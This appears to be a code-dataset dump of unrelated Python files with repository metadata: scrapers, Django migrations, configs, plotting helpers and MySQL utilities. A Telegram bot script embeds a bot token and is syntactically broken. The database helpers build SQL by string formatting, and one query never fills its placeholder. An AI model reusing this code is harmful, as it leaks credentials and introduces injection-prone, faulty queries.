] | permissive | timedata-org/timedata | 61cde905b1fe9eb60ac83ecbf5a5a2114793c45d | 3faac7450678aaccd4a283d0d41ca3e7f113f51b | refs/heads/master | 2020-04-11T12:03:57.962646 | 2019-06-09T10:05:16 | 2019-06-09T10:05:52 | 51,217,217 | 5 | 3 | null | 2016-09-18T16:20:43 | 2016-02-06T19:13:43 | C++ | UTF-8 | Python | false | false | 173 | py | from kivy.uix.label import Label
class Wombat2(Label):
def __init__(self, *args, **kwds):
super().__init__(*args, **kwds)
print('wombat2 constructed')
| [
"tom@swirly.com"
] | tom@swirly.com |
4ed252d7f3459a256fba7d6f46a04fdc456dec6c | 3d50f97420e7aa79be37cc238555ef2038064afb | /stocks/tests/models/test_HSGTCGHold.py | 5bc7b08ac0cbc7b9c39c326e5fcb5beff4924753 | [
"MIT"
] | permissive | tauruswang/wanggeService | d6948704f5e28c1603e864e32986cc91eaf816b2 | 7aa6687ece9a865930c5dbab506cad5955848457 | refs/heads/master | 2020-03-19T05:52:36.264023 | 2018-06-01T03:32:27 | 2018-06-01T03:32:27 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,490 | py | # -*- coding: utf-8 -*-
"""
-------------------------------------------------
@File : test_HSGTCGHold.py
Description :
@Author : pchaos
date: 2018-5-31
-------------------------------------------------
Change Activity:
18-5-31:
@Contact : p19992003#gmail.com
-------------------------------------------------
"""
from django.test import TestCase
from stocks.models import HSGTCGHold
import selenium
from selenium import webdriver
from selenium.webdriver.firefox.options import Options
from bs4 import BeautifulSoup
import re
import pandas as pd
import numpy as np
import datetime, time
__author__ = 'pchaos'
class TestHSGTCGHold(TestCase):
def test_stockstatistics(self):
""" 北持股向市值大于八千万
:return:
"""
browser = webdriver.Firefox()
browser.maximize_window()
try:
results = []
pages = range(1, 37, 1)
pages = range(1, 250, 1) # 30日市值排序
url = 'http://data.eastmoney.com/hsgtcg/StockStatistics.aspx'
browser.get(url)
# 北向持股
browser.find_element_by_css_selector('.border_left_1').click()
time.sleep(2)
# 市值排序
browser.find_element_by_css_selector(
'#tb_ggtj > thead:nth-child(1) > tr:nth-child(1) > th:nth-child(8)').click()
time.sleep(1.5)
for page in pages:
soup = BeautifulSoup(browser.page_source, 'lxml')
table = soup.find_all(id='tb_ggtj')[0]
df = pd.read_html(str(table), header=1)[0]
df.columns = ['tradedate', 'code', 'name', 'a1', 'close', 'zd', 'hvol', 'hamount', 'hpercent', 'oneday',
'fiveday',
'tenday']
# 修复code长度,前补零
df['code'] = df.code.astype(str)
df['code'] = df['code'].apply(lambda x: x.zfill(6))
# 修复持股数量
df['hvol'] = df['hvol'].apply(lambda x: HSGTCGHold.hz2Num(x)).astype(float)
df['hamount'] = df['hamount'].apply(lambda x: HSGTCGHold.hz2Num(x)).astype(float)
# 删除多余的列
del df['oneday']
del df['fiveday']
del df['tenday']
del df['a1']
results.append(df[df['hamount'] >= 8000])
if len(df[df['hamount'] < 8000]):
# 持股金额小于
break
else:
# 下一页
t = browser.find_element_by_css_selector('#PageContgopage')
t.clear()
t.send_keys(str(page + 1))
btnenable = True
while btnenable:
try:
btn=browser.find_element_by_css_selector('.btn_link')
btn.click()
btnenable =False
except Exception as e:
print('not ready click. Waiting')
time.sleep(0.1)
time.sleep(1.5)
# print(df)
print('results\n{}'.format(results))
finally:
if browser:
browser.close()
self.assertTrue(len(results) > 3)
# results 整合
dfn = pd.DataFrame()
for dfa in results:
dfn = pd.concat([dfn, dfa])
dfn.reset_index(drop=True, inplace=True)
self.assertFalse(dfn[['code', 'tradedate']] is None)
df = dfn[['code', 'tradedate']]
# 去除重复数据
df = df[~df.duplicated()]
# pandas dataframe save to model
HSGTCGHold.objects.bulk_create(
HSGTCGHold(**vals) for vals in df[['code', 'tradedate']].to_dict('records')
)
self.assertTrue(HSGTCGHold.getlist().count() > 0, '北向持股大于七千万的股票数量大于0')
print(HSGTCGHold.getlist())
def test_importList(self):
HSGTCGHold.importList()
hsg = HSGTCGHold.getlist(tradedate=datetime.datetime.now().date() - datetime.timedelta(1))
self.assertTrue(hsg.count() > 10 , '北向持股大于七千万的股票数量大于10, 实际数量:{}'.format(hsg.count()))
self.assertTrue(isinstance(hsg[0].tradedate, datetime.date))
| [
"drifthua@gmail.com"
] | drifthua@gmail.com |
d493fdc54449949f63febe3288ddf68ef1dfc048 | 2a948e27dc09d99090d09472f488e4a6224db621 | /main.py | 0f689793f528e5f7b5094863b68b81662992f154 | [] | no_license | hristo-grudev/expobankrs | a88da6f12f48f0f3705f08c66da1fa11132defdc | df935b0d28af115cc575d122870f80b4c4d0df82 | refs/heads/main | 2023-03-25T11:54:13.042713 | 2021-03-08T13:49:51 | 2021-03-08T13:49:51 | 345,671,919 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 77 | py | from scrapy import cmdline
cmdline.execute("scrapy crawl expobankrs".split()) | [
"hr.grudev@gmail.com"
] | hr.grudev@gmail.com |
0417c2835eac339494cbb1098e8e8fd018780afa | 8d86f0d90a36b97903d07455edb37611a6958832 | /Apps/users/migrations/0001_initial.py | d7bdc634de207e4003b00c5aec1e4d014aaca00a | [] | no_license | urimeba/diagnosticapp | 4615232224e61e513dcce6557197eeca9b9ece86 | 311bdadabe6c2883c6d7395963cd23c3d7ebca03 | refs/heads/main | 2023-01-21T07:48:04.510799 | 2020-11-30T21:28:21 | 2020-11-30T21:28:21 | 313,359,803 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,037 | py | # Generated by Django 3.1.3 on 2020-11-23 19:29
import django.contrib.auth.models
import django.contrib.auth.validators
from django.db import migrations, models
import django.utils.timezone
class Migration(migrations.Migration):
initial = True
dependencies = [
('auth', '0012_alter_user_first_name_max_length'),
]
operations = [
migrations.CreateModel(
name='User',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('password', models.CharField(max_length=128, verbose_name='password')),
('last_login', models.DateTimeField(blank=True, null=True, verbose_name='last login')),
('is_superuser', models.BooleanField(default=False, help_text='Designates that this user has all permissions without explicitly assigning them.', verbose_name='superuser status')),
('username', models.CharField(error_messages={'unique': 'A user with that username already exists.'}, help_text='Required. 150 characters or fewer. Letters, digits and @/./+/-/_ only.', max_length=150, unique=True, validators=[django.contrib.auth.validators.UnicodeUsernameValidator()], verbose_name='username')),
('first_name', models.CharField(blank=True, max_length=150, verbose_name='first name')),
('last_name', models.CharField(blank=True, max_length=150, verbose_name='last name')),
('email', models.EmailField(blank=True, max_length=254, verbose_name='email address')),
('is_staff', models.BooleanField(default=False, help_text='Designates whether the user can log into this admin site.', verbose_name='staff status')),
('is_active', models.BooleanField(default=True, help_text='Designates whether this user should be treated as active. Unselect this instead of deleting accounts.', verbose_name='active')),
('date_joined', models.DateTimeField(default=django.utils.timezone.now, verbose_name='date joined')),
('genero', models.CharField(choices=[('H', 'Hombre'), ('M', 'Mujer')], max_length=1, null=True, verbose_name='Genero')),
('edad', models.PositiveIntegerField(null=True)),
('groups', models.ManyToManyField(blank=True, help_text='The groups this user belongs to. A user will get all permissions granted to each of their groups.', related_name='user_set', related_query_name='user', to='auth.Group', verbose_name='groups')),
('user_permissions', models.ManyToManyField(blank=True, help_text='Specific permissions for this user.', related_name='user_set', related_query_name='user', to='auth.Permission', verbose_name='user permissions')),
],
options={
'verbose_name_plural': 'Usuarios',
'ordering': ['id'],
},
managers=[
('objects', django.contrib.auth.models.UserManager()),
],
),
]
| [
"urimeba511@gmail.com"
] | urimeba511@gmail.com |
7bb83d0baa185fe756143ee095e6f0fecca1c70b | dafafb8f65cd93dd1f6567d9b8e431e31f19ae68 | /dms/views/apply/music.py | de272d9f96fe77147c3b2527b8dad48277fe174a | [
"MIT"
] | permissive | SangminOut/DMS-Sanic | 7fb877b2a772de808b7391428e151b2a2645c59d | bbb65c584711fa23dbf0455300307c2acceba013 | refs/heads/master | 2020-06-15T06:11:33.116199 | 2019-07-14T12:57:11 | 2019-07-14T12:57:58 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 481 | py | from sanic.request import Request
from sanic.views import HTTPMethodView
class MusicApplyView(HTTPMethodView):
def get(self, request: Request, weekday: int):
"""
Response Music Apply Status
"""
pass
def post(self, request: Request, weekday: int):
"""
Apply Music
"""
pass
def delete(self, request: Request, weekday: int):
"""
Delete Music apply on the weekday
"""
pass
| [
"python@istruly.sexy"
] | python@istruly.sexy |
24430bb2f438aace2477e6ae54cfe4c876848f5c | 4dd695521343d56ff943e8c1768343d7680714e3 | /experiments/scripts_auto_closedset_ynoguti/config_SVM_128_fold10.py | f5343d3ddb38f0516fe592dabbc19c413e186cf9 | [] | no_license | natharb/environment | ea659ee541f6473e92b5b30c549e52b66f47b280 | 86e6cee6e01d2370abeb7c55a2c8a15001735919 | refs/heads/master | 2021-09-28T02:39:02.222966 | 2018-11-13T12:03:34 | 2018-11-13T12:03:34 | 139,762,646 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,353 | py | #!/usr/bin/env python
# vim: set fileencoding=utf-8 :
#Nathália Alves Rocha Batista (nathbapt@decom.fee.unicamp.br)
import sys
sys.path.insert(0, '.')
import bob.bio.spear
import bob.bio.gmm
import numpy
import scipy.spatial
temp_directory = './results/closedset_ynoguti/SVM/128/fold_10/temp/'
result_directory = './results/closedset_ynoguti/SVM/128/fold_10/results/'
sub_directory = 'subdirectory'
database = 'database_SVM_128_fold10.py'
groups = ['dev']
#groups = ['dev', 'eval']
preprocessor = bob.bio.spear.preprocessor.Energy_2Gauss(max_iterations = 10, convergence_threshold = 0.0005, variance_threshold = 0.0005, win_length_ms = 20., win_shift_ms = 10., smoothing_window = 10)
extractor = bob.bio.spear.extractor.Cepstral(win_length_ms = 25, win_shift_ms = 10, n_filters = 24 , dct_norm = False, f_min = 0, f_max = 4000, delta_win = 2, mel_scale = True, with_energy = True, with_delta = True, with_delta_delta = True, n_ceps = 19, pre_emphasis_coef = 0.97)
algorithm = bob.bio.gmm.algorithm.SVMGMM(number_of_gaussians = 128, kmeans_training_iterations = 10, gmm_training_iterations = 10,
training_threshold = 5e-4, variance_threshold = 5e-4, update_weights = True, update_means = True, update_variances = True, relevance_factor = 4, gmm_enroll_iterations = 1, responsibility_threshold = 0, INIT_SEED = 5489)
#parallel = 40
#verbose = 2 | [
"nathbapt@decom.fee.unicamp.br"
] | nathbapt@decom.fee.unicamp.br |
de9de4589510affd0dcae62be57fd19a0178ca96 | 2baf095631192604a2aabdeeb2aa230b4229076c | /benchmark/plot.py | ce577c556d017b0073c4627b5c3a452d4c50a29d | [] | no_license | ximitiejiang/machine_learning_algorithm | 14ea7cf991381375b6cbe34030a477e6a949abe1 | a26c64a561985444c1fc23db4ab298af255d1177 | refs/heads/master | 2020-03-26T23:02:10.614960 | 2019-12-05T14:54:49 | 2019-12-05T14:54:49 | 145,505,075 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,736 | py | import progressbar
#from mpl_toolkits.mplot3d import Axes3D
import matplotlib.pyplot as plt
import matplotlib.cm as cmx
import matplotlib.colors as colors
import numpy as np
#from mlfromscratch.utils.data_operation import calculate_covariance_matrix
#from mlfromscratch.utils.data_operation import calculate_correlation_matrix
#from mlfromscratch.utils.data_manipulation import standardize
bar_widgets = [
'Training: ', progressbar.Percentage(), ' ', progressbar.Bar(marker="-", left="[", right="]"),
' ', progressbar.ETA()
]
def calculate_variance(X): # 计算方差
""" Return the variance of the features in dataset X """
mean = np.ones(np.shape(X)) * X.mean(0)
n_samples = np.shape(X)[0]
variance = (1 / n_samples) * np.diag((X - mean).T.dot(X - mean))
return variance
def calculate_std_dev(X): # 计算标准差
""" Calculate the standard deviations of the features in dataset X """
std_dev = np.sqrt(calculate_variance(X))
return std_dev
def standardize(X): # 标准化
""" Standardize the dataset X """
X_std = X
mean = X.mean(axis=0)
std = X.std(axis=0)
for col in range(np.shape(X)[1]):
if std[col]:
X_std[:, col] = (X_std[:, col] - mean[col]) / std[col]
# X_std = (X - X.mean(axis=0)) / X.std(axis=0)
return X_std
def calculate_covariance_matrix(X, Y=None): # 计算协方差矩阵
""" Calculate the covariance matrix for the dataset X """
if Y is None:
Y = X
n_samples = np.shape(X)[0]
covariance_matrix = (1 / (n_samples-1)) * (X - X.mean(axis=0)).T.dot(Y - Y.mean(axis=0))
return np.array(covariance_matrix, dtype=float)
def calculate_correlation_matrix(X, Y=None): # 计算相关系数矩阵
""" Calculate the correlation matrix for the dataset X """
if Y is None:
Y = X
n_samples = np.shape(X)[0]
covariance = (1 / n_samples) * (X - X.mean(0)).T.dot(Y - Y.mean(0))
std_dev_X = np.expand_dims(calculate_std_dev(X), 1)
std_dev_y = np.expand_dims(calculate_std_dev(Y), 1)
correlation_matrix = np.divide(covariance, std_dev_X.dot(std_dev_y.T))
return np.array(correlation_matrix, dtype=float)
class Plot():
def __init__(self):
self.cmap = plt.get_cmap('viridis')
def _transform(self, X, dim):
covariance = calculate_covariance_matrix(X) # 计算协方差covariance
eigenvalues, eigenvectors = np.linalg.eig(covariance) # 计算协方差矩阵的特征值eigenvalues和特征向量eigenvectors
# Sort eigenvalues and eigenvector by largest eigenvalues
idx = eigenvalues.argsort()[::-1] #对特征值从大到小排序
eigenvalues = eigenvalues[idx][:dim] #提取前dim个特征值
eigenvectors = np.atleast_1d(eigenvectors[:, idx])[:, :dim] # 提取特征值对应特征向量
# Project the data onto principal components
X_transformed = X.dot(eigenvectors) # X*eigenvectors 特征乘以特征向量
return X_transformed
def plot_regression(self, lines, title, axis_labels=None, mse=None, scatter=None, legend={"type": "lines", "loc": "lower right"}):
if scatter:
scatter_plots = scatter_labels = []
for s in scatter:
scatter_plots += [plt.scatter(s["x"], s["y"], color=s["color"], s=s["size"])]
scatter_labels += [s["label"]]
scatter_plots = tuple(scatter_plots)
scatter_labels = tuple(scatter_labels)
for l in lines:
li = plt.plot(l["x"], l["y"], color=s["color"], linewidth=l["width"], label=l["label"])
if mse:
plt.suptitle(title)
plt.title("MSE: %.2f" % mse, fontsize=10)
else:
plt.title(title)
if axis_labels:
plt.xlabel(axis_labels["x"])
plt.ylabel(axis_labels["y"])
if legend["type"] == "lines":
plt.legend(loc="lower_left")
elif legend["type"] == "scatter" and scatter:
plt.legend(scatter_plots, scatter_labels, loc=legend["loc"])
plt.show()
# Plot the dataset X and the corresponding labels y in 2D using PCA.
def plot_in_2d(self, X, y=None, title=None, accuracy=None, legend_labels=None):
X_transformed = self._transform(X, dim=2)
x1 = X_transformed[:, 0]
x2 = X_transformed[:, 1]
class_distr = []
y = np.array(y).astype(int)
colors = [self.cmap(i) for i in np.linspace(0, 1, len(np.unique(y)))]
# Plot the different class distributions
for i, l in enumerate(np.unique(y)):
_x1 = x1[y == l]
_x2 = x2[y == l]
_y = y[y == l]
class_distr.append(plt.scatter(_x1, _x2, color=colors[i]))
# Plot legend
if not legend_labels is None:
plt.legend(class_distr, legend_labels, loc=1)
# Plot title
if title:
if accuracy:
perc = 100 * accuracy
plt.suptitle(title)
plt.title("Accuracy: %.1f%%" % perc, fontsize=10)
else:
plt.title(title)
# Axis labels
plt.xlabel('Principal Component 1')
plt.ylabel('Principal Component 2')
plt.show()
# Plot the dataset X and the corresponding labels y in 3D using PCA.
def plot_in_3d(self, X, y=None):
X_transformed = self._transform(X, dim=3)
x1 = X_transformed[:, 0]
x2 = X_transformed[:, 1]
x3 = X_transformed[:, 2]
fig = plt.figure()
ax = fig.add_subplot(111, projection='3d')
ax.scatter(x1, x2, x3, c=y)
plt.show()
| [
"ximitiejiang@163.com"
] | ximitiejiang@163.com |
7fa07c81e77c3c7452bffd7ef527182c0b399ad3 | 8da91c26d423bacbeee1163ac7e969904c7e4338 | /pyvisdk/do/host_internet_scsi_hba_authentication_capabilities.py | c35666aac4c0338cccda1bb6bc8f959b7d9f3d45 | [] | no_license | pexip/os-python-infi-pyvisdk | 5d8f3a3858cdd61fb76485574e74ae525cdc7e25 | 1aadea0afbc306d09f6ecb9af0e683dbbf961d20 | refs/heads/master | 2023-08-28T02:40:28.789786 | 2020-07-16T04:00:53 | 2020-07-16T04:00:53 | 10,032,240 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,207 | py |
import logging
from pyvisdk.exceptions import InvalidArgumentError
########################################
# Automatically generated, do not edit.
########################################
log = logging.getLogger(__name__)
def HostInternetScsiHbaAuthenticationCapabilities(vim, *args, **kwargs):
'''The authentication capabilities for this host bus adapter.'''
obj = vim.client.factory.create('{urn:vim25}HostInternetScsiHbaAuthenticationCapabilities')
# do some validation checking...
if (len(args) + len(kwargs)) < 4:
raise IndexError('Expected at least 5 arguments got: %d' % len(args))
required = [ 'chapAuthSettable', 'krb5AuthSettable', 'spkmAuthSettable', 'srpAuthSettable' ]
optional = [ 'mutualChapSettable', 'targetChapSettable', 'targetMutualChapSettable',
'dynamicProperty', 'dynamicType' ]
for name, arg in zip(required+optional, args):
setattr(obj, name, arg)
for name, value in kwargs.items():
if name in required + optional:
setattr(obj, name, value)
else:
raise InvalidArgumentError("Invalid argument: %s. Expected one of %s" % (name, ", ".join(required + optional)))
return obj
| [
"jmb@pexip.com"
] | jmb@pexip.com |
5ae62e7a2aebbe4228d9013bd093f34148deefa5 | d57b51ec207002e333b8655a8f5832ed143aa28c | /.history/nanachi_20200619190147.py | 86f02fde6c3e6677051477be28e1a4ea19c0aee3 | [] | no_license | yevheniir/python_course_2020 | b42766c4278a08b8b79fec77e036a1b987accf51 | a152d400ab4f45d9d98d8ad8b2560d6f0b408c0b | refs/heads/master | 2022-11-15T07:13:24.193173 | 2020-07-11T15:43:26 | 2020-07-11T15:43:26 | 278,890,802 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 303 | py | import telebot
bot = telebot.TeleBot('776550937:AAELEr0c3H6dM-9QnlDD-0Q0Fcd65pPyAiM')
@bot.message_handler(content_types=['text'])
def send_text(message):
if message.text[0].lower() == "н" and :
bot.send_message(message.chat.id, message.text + message.text[1:] )
bot.polling()
def c | [
"yevheniira@intelink-ua.com"
] | yevheniira@intelink-ua.com |
f6ce243146b5a953f28c66da59306e9142735527 | bad0f9497e549d729d342f84d7fae197cccdd198 | /docs/source/conf.py | 77b14d6ed6f15026ed9dce76aebf1bae589ece6e | [
"BSD-3-Clause"
] | permissive | talpor/django-activity-stream | 2f900dc95561d9bdaf23934463524c68bae567de | 8348bec4ee80be2cc19aa17932ecaf81f6df9def | refs/heads/master | 2021-01-15T23:02:45.341247 | 2018-05-17T18:50:50 | 2018-05-17T18:50:50 | 32,185,029 | 0 | 0 | null | 2015-03-13T22:55:08 | 2015-03-13T22:55:06 | Python | UTF-8 | Python | false | false | 5,763 | py | # -*- coding: utf-8 -*-
#
# Django Activity Stream documentation build configuration file, created by
# sphinx-quickstart on Sat Oct 1 12:35:29 2011.
#
# This file is execfile()d with the current directory set to its containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
import os
import sys
from datetime import datetime
os.environ['DJANGO_SETTINGS_MODULE'] = 'actstream.runtests.settings'
sys.path.insert(0, os.path.join(os.path.dirname(__file__), '../../actstream/runtests'))
sys.path.insert(0, os.path.join(os.path.dirname(__file__), '../..'))
import django
try:
django.setup()
except AttributeError:
pass
import actstream
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#sys.path.insert(0, os.path.abspath('.'))
# -- General configuration -----------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be extensions
# coming with Sphinx (named 'sphinx.ext.*') or your custom ones.
extensions = ['sphinx.ext.autodoc', 'sphinx.ext.viewcode']
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix of source filenames.
source_suffix = '.rst'
# The encoding of source files.
#source_encoding = 'utf-8-sig'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'Django Activity Stream'
copyright = u'2010-%s, Justin Quick. Activity Streams logo released under ' \
u'<a href="http://creativecommons.org/licenses/by/3.0/">Creative Commons 3.0</a>' % datetime.now().year
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = actstream.get_version(False)
# The full version, including alpha/beta/rc tags.
release = actstream.get_version()
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#language = None
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
#today_fmt = '%B %d, %Y'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = []
# The reST default role (used for this markup: `text`) to use for all documents.
#default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'tango'
# A list of ignored prefixes for module index sorting.
#modindex_common_prefix = []
# -- Options for HTML output ---------------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
import alabaster
extensions.append('alabaster')
html_theme_path = [alabaster.get_path()]
html_theme = 'alabaster'
html_sidebars = {
'**': [
'about.html', 'navigation.html', 'searchbox.html', 'donate.html',
]
}
html_static_path = ['_static']
html_theme_options = {
'logo': 'logo.jpg',
'logo_text_align': 'center',
'description': 'Generic activity streams for Django',
'github_user': 'justquick',
'github_repo': 'django-activity-stream',
'travis_button': True,
'gittip_user': 'justquick',
'analytics_id': 'UA-42089198-1'
}
# Output file base name for HTML help builder.
htmlhelp_basename = 'DjangoActivityStreamdoc'
# -- Options for LaTeX output --------------------------------------------------
# The paper size ('letter' or 'a4').
#latex_paper_size = 'letter'
# The font size ('10pt', '11pt' or '12pt').
#latex_font_size = '10pt'
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title, author, documentclass [howto/manual]).
latex_documents = [
('index', 'DjangoActivityStream.tex', u'Django Activity Stream Documentation',
u'Justin Quick', 'manual'),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
#latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
#latex_use_parts = False
# If true, show page references after internal links.
#latex_show_pagerefs = False
# If true, show URL addresses after external links.
#latex_show_urls = False
# Additional stuff for the LaTeX preamble.
#latex_preamble = ''
# Documents to append as an appendix to all manuals.
#latex_appendices = []
# If false, no module index is generated.
#latex_domain_indices = True
# -- Options for manual page output --------------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
('index', 'djangoactivitystream', u'Django Activity Stream Documentation',
[u'Justin Quick'], 1)
]
| [
"justquick@gmail.com"
] | justquick@gmail.com |
5ece19536166f0b866ad549915f7002b119a6b49 | 1b3e62ac5655fbcbb7cf95724354c8e69d487745 | /HSE WEEK 5/HSE 5 Task 31.py | c9619f61ea9d0944c84c7a376de659ef19fa3cc9 | [] | no_license | syth0le/HSE.Python | 7d97f38e9b57825b54ac2576b00731240eef227c | e9a15b1ed5e21d56281e4619a39198d5d2838f0b | refs/heads/master | 2021-01-14T17:35:30.427970 | 2020-03-24T17:23:30 | 2020-03-24T17:23:30 | 242,698,160 | 5 | 1 | null | 2020-03-23T19:41:20 | 2020-02-24T09:43:15 | Python | UTF-8 | Python | false | false | 167 | py | numList = input().split()
for i in range(0, len(numList), 2):
numList[i:i+2] = numList[i:i+2][::-1]
readylist = list(map(str, numList))
print(' '.join(readylist))
| [
"chdan565@gamil.com"
] | chdan565@gamil.com |
7180394060ae55aeb4c339d0562f330eaaf40bca | 56bf6c68e78257e887de9e5eae11fc6652ce7f06 | /bbdd/Scripts/bbdd/productos/migrations/0002_auto_20170313_1111.py | 971ae6caf6b0803bf878e97cde5caee4a2089a6a | [] | no_license | CarlosSanz81/bbdd | 1d1c670e16f0e8ee81fb929767d8f65b7361cbe3 | 3b1febaddfef93fffeb34c3970281e4a37d05146 | refs/heads/master | 2023-01-09T03:20:02.042514 | 2017-03-13T11:07:15 | 2017-03-13T11:07:15 | 84,815,195 | 0 | 1 | null | 2022-12-20T09:00:14 | 2017-03-13T10:45:00 | Python | UTF-8 | Python | false | false | 3,508 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.10.6 on 2017-03-13 10:11
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('productos', '0001_initial'),
]
operations = [
migrations.RenameField(
model_name='producto',
old_name='descripcion_cliente',
new_name='apellido1',
),
migrations.RenameField(
model_name='producto',
old_name='nombre_cliente',
new_name='apellido2',
),
migrations.RenameField(
model_name='producto',
old_name='presupuesto',
new_name='codigoImprenta',
),
migrations.RenameField(
model_name='producto',
old_name='numero_cliente',
new_name='cp',
),
migrations.RemoveField(
model_name='producto',
name='fijo',
),
migrations.RemoveField(
model_name='producto',
name='image',
),
migrations.RemoveField(
model_name='producto',
name='margen',
),
migrations.RemoveField(
model_name='producto',
name='numero_parte',
),
migrations.AddField(
model_name='producto',
name='direcc',
field=models.CharField(default=0, max_length=255),
preserve_default=False,
),
migrations.AddField(
model_name='producto',
name='fecha',
field=models.DateTimeField(auto_now=True),
),
migrations.AddField(
model_name='producto',
name='movil',
field=models.DecimalField(decimal_places=0, default=0, max_digits=9),
preserve_default=False,
),
migrations.AddField(
model_name='producto',
name='nombre',
field=models.CharField(default=0, max_length=255),
preserve_default=False,
),
migrations.AddField(
model_name='producto',
name='nombreCompleto',
field=models.CharField(default=0, max_length=255),
preserve_default=False,
),
migrations.AddField(
model_name='producto',
name='pedido',
field=models.CharField(default=0, max_length=255),
preserve_default=False,
),
migrations.AddField(
model_name='producto',
name='poblacion',
field=models.CharField(default=0, max_length=255),
preserve_default=False,
),
migrations.AddField(
model_name='producto',
name='provincia',
field=models.CharField(default=0, max_length=255),
preserve_default=False,
),
migrations.AddField(
model_name='producto',
name='remesa',
field=models.CharField(default=0, max_length=255),
preserve_default=False,
),
migrations.AddField(
model_name='producto',
name='telefono',
field=models.DecimalField(decimal_places=0, default=0, max_digits=9),
preserve_default=False,
),
migrations.AlterField(
model_name='producto',
name='isbn',
field=models.DecimalField(decimal_places=0, max_digits=13),
),
]
| [
"carlossanzgarcia81@gmail.com"
] | carlossanzgarcia81@gmail.com |
62c94db115f11585424e8df49b2baf70d5c8bc4d | 9a486a87e028303a551fbd0d1e1b6b650387ea14 | /propose/anim/me_send/human_skin.py | 23974e36ca1961c8edd87e9707c50518b46b0440 | [] | no_license | shanlihou/pythonFunc | 7b8e7064fddd4522e492c915c086cc6c5abc6eec | 646920256551ccd8335446dd4fe11aa4b9916f64 | refs/heads/master | 2022-08-24T20:33:12.287464 | 2022-07-21T12:00:10 | 2022-07-21T12:00:10 | 24,311,639 | 3 | 0 | null | null | null | null | UTF-8 | Python | false | false | 646 | py |
skin = [
('head', (174, 229), 'me.png', True, True, 0.2),
('upper_arm1', (11, 56), 'all.png', True, True, 0.2),
('lower_arm1', (11, 59), 'all.png', True, True, 0.2),
('upper_arm2', (9, 60), 'all.png', True, True, 0.2),
('lower_arm2', (8, 60), 'all.png', True, True, 0.2),
('upper_leg1', (11, 58), 'all.png', True, True, 0.2),
('lower_leg1', (9, 63), 'all.png', True, True, 0.2),
('upper_leg2', (11, 57), 'all.png', True, True, 0.2),
('lower_leg2', (11, 59), 'all.png', True, True, 0.2),
('body', (24, 124), 'all.png', True, True, 0.5),
('cell_phone', (24, 124), 'cellphone.png', True, True, 0.5),
]
| [
"shanlihou@gmail.com"
] | shanlihou@gmail.com |
a99808919eadfeaef81265b7cda8db9b9fd19fe4 | b834509b4d3bf3b9161c3ac9ea2984af17bebf5e | /icvUI/dbsession/panel.py | de24cb4c4d427413ea39deb950f953065b7ee523 | [] | no_license | RichardZhong/meiduo | a338dc6b78da71df60ebff7827c5ba6225081650 | 4d530b4870d3353daaf4b1505998156595055073 | refs/heads/master | 2020-08-22T12:12:07.870793 | 2018-09-26T03:26:49 | 2018-09-26T03:26:49 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,861 | py | from icvUI.dbsession import *
# 获取属于面板功能的camera
def query_panel_camera():
try:
conn = mc.connect(**fs_icv_db)
cursor = conn.cursor(dictionary = True)
query_sql = "SELECT panel_ori.camera_id,description,ori_data FROM camera,panel_ori WHERE FIND_IN_SET('panel',application) AND panel_ori.camera_id = camera.camera_id ORDER BY panel_ori.camera_id;"
cursor.execute(query_sql)
data = cursor.fetchall()
# print(data)
return data
except Exception as e:
print(e)
return None
finally:
cursor.close()
conn.close()
def query_panel_label():
try:
conn = mc.connect(**fs_icv_db)
cursor = conn.cursor(dictionary = True)
query_sql = "SELECT label_zh FROM panel_label;"
cursor.execute(query_sql)
data = cursor.fetchall()
return data
except Exception as e:
print(e)
return None
finally:
cursor.close()
conn.close()
# 获取面板相机第一帧图片
def query_panel_first_frame(camera_id):
try:
conn = mc.connect(**fs_icv_db)
cursor = conn.cursor(dictionary = True)
query_sql = "SELECT camera_id, frame_img FROM panel_first_frame WHERE camera_id = '{camera_id}';"
cursor.execute(query_sql)
data = cursor.fetchone()
return data
except Exception as e:
print(e)
return None
finally:
cursor.close()
conn.close()
# 插入面板数据
def update_panel_data(camera_id, ori_data):
try:
conn = mc.connect(**fs_icv_db)
cursor = conn.cursor(dictionary = True)
update_sql = "UPDATE panel_ori SET ori_data = '{}' WHERE camera_id = '{}';".format(ori_data,camera_id)
cursor.execute(update_sql)
conn.commit()
return 'ok'
except Exception as e:
print(e)
return 'wrong'
finally:
cursor.close()
conn.close()
# 获取最新面板结果
